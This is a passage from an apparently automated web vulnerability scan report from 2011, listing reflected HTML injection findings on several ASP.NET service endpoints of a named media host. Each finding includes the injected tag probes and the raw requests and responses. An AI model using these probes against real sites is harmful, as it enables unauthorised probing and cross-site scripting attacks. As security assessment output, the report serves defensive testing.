GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ChannelInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793e429d<a>9a69387f93 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:23:21 GMT
Connection: close
Content-Length: 20165

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793e429d<a>9a69387f93/ChannelInfoService.asmx" />
...[SNIP]...

1.67. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ClipInfoService.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ClipInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e29d7<a>b1a3288f611 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ClipInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793&e29d7<a>b1a3288f611=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 02:38:46 GMT
Content-Length: 22408
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793&e29d7<a>b1a3288f611=1/ClipInfoService.asmx" />
...[SNIP]...

1.68. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ClipInfoService.aspx [siteid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ClipInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 498aa<a>e0fd8eb2d55 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ClipInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793498aa<a>e0fd8eb2d55 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 02:38:45 GMT
Content-Length: 22396
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793498aa<a>e0fd8eb2d55/ClipInfoService.asmx" />
...[SNIP]...

1.69. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ErrorInfoService.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ErrorInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6a8d2<a>17423d31d6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ErrorInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793&6a8d2<a>17423d31d6d=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 02:38:51 GMT
Content-Length: 5637
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793&6a8d2<a>17423d31d6d=1/ErrorInfoService.asmx" />
...[SNIP]...

1.70. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ErrorInfoService.aspx [siteid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ErrorInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload dc61b<a>d0ae21d4f0d was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ErrorInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793dc61b<a>d0ae21d4f0d HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 02:38:50 GMT
Content-Length: 5625
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793dc61b<a>d0ae21d4f0d/ErrorInfoService.asmx" />
...[SNIP]...

1.71. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/PlaylistInfoService.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/PlaylistInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 86197<a>4a43d3f7b2b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/PlaylistInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793&86197<a>4a43d3f7b2b=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:23:22 GMT
Connection: close
Content-Length: 27398

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793&86197<a>4a43d3f7b2b=1/PlaylistInfoService.asmx" />
...[SNIP]...

1.72. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/PlaylistInfoService.aspx [siteid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/PlaylistInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload b9c7e<a>35d09de45cf was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/PlaylistInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793b9c7e<a>35d09de45cf HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:23:21 GMT
Connection: close
Content-Length: 27386

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793b9c7e<a>35d09de45cf/PlaylistInfoService.asmx" />
...[SNIP]...

1.73. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/RSSService.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/RSSService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5469e<a>513a789c5d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/RSSService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793&5469e<a>513a789c5d2=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 02:38:50 GMT
Content-Length: 8814
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793&5469e<a>513a789c5d2=1/RSSService.asmx" />
...[SNIP]...

1.74. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/RSSService.aspx [siteid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/RSSService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 73e9a<a>69fb6f0fe85 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/RSSService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-23379373e9a<a>69fb6f0fe85 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 02:38:49 GMT
Content-Length: 8802
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-23379373e9a<a>69fb6f0fe85/RSSService.asmx" />
...[SNIP]...

1.75. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/RatingService.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/RatingService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4ccd3<a>bf3a55c6529 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/RatingService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793&4ccd3<a>bf3a55c6529=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 02:38:50 GMT
Content-Length: 5534
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793&4ccd3<a>bf3a55c6529=1/RatingService.asmx" />
...[SNIP]...

1.76. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/RatingService.aspx [siteid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/RatingService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload cf92f<a>bc8ac13f1f3 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/RatingService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793cf92f<a>bc8ac13f1f3 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 02:38:48 GMT
Content-Length: 5522
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793cf92f<a>bc8ac13f1f3/RatingService.asmx" />
...[SNIP]...

1.77. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/AdServerService.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/AdServerService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 764aa<a>4eb8c021511 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/AdServerService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796&764aa<a>4eb8c021511=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:02 GMT
Content-Length: 1913
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796&764aa<a>4eb8c021511=1/AdServerService.asmx" />
...[SNIP]...

1.78. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/AdServerService.aspx [siteid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/AdServerService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload dd15e<a>c58085d49ac was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/AdServerService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796dd15e<a>c58085d49ac HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:00 GMT
Content-Length: 1907
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796dd15e<a>c58085d49ac/AdServerService.asmx" />
...[SNIP]...

1.79. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ChannelInfoService.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ChannelInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d8592<a>7f38885c00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ChannelInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796&d8592<a>7f38885c00=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:45:47 GMT
Connection: close
Content-Length: 20177

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796&d8592<a>7f38885c00=1/ChannelInfoService.asmx" />
...[SNIP]...

1.80. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ChannelInfoService.aspx [siteid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ChannelInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload af957<a>c761acd24e8 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ChannelInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796af957<a>c761acd24e8 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:45:46 GMT
Connection: close
Content-Length: 20169

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796af957<a>c761acd24e8/ChannelInfoService.asmx" />
...[SNIP]...

1.81. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ClipInfoService.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ClipInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8bdb6<a>f2e8c6d2662 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ClipInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796&8bdb6<a>f2e8c6d2662=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
